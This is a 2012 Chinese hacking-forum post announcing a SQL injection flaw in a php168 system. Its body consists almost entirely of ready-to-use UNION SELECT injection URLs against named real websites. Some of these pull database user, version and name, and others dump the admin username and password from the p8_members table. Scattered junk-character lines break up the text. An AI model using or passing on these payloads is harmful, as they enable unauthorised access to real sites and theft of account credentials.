找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3160|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--) U# p4 J  {/ o6 H9 I' c) W
                                                         
  {# F! r4 Z2 F# b* z                                       5 C, o1 W) b) c+ g
4 X% B$ H0 f: ^8 I8 g
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
; Y1 M8 y  _9 R  ~) w% m' g6 N                                                     
) y" J& ?- G2 H, c4 k                                                                   ! p) J' R1 U2 f  ]6 a
                                                        
" ~6 ^, @& a, N; S  v6 Ahttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
1 D" M( |1 i* ]6 b8 j. z0 ]9 J# {. D5 @7 F$ R2 w

% d: C! L& P* `  R8 z% d' S. p
$ u4 h+ i8 b4 E' y0 j                                                            
& D0 h7 s& i* [$ t 8 O# f3 b. z* B' c4 S
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
! ?' T4 |4 z7 ], R$ ^* P1 L# ]$ s7 Q1 A- \# [( D( v' H
' h' T# a! z- K' N4 t

* e6 Y- ]) v  u. L1 p8 G4 J  g                                                                    . `- L. j- Z8 F4 [2 q

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表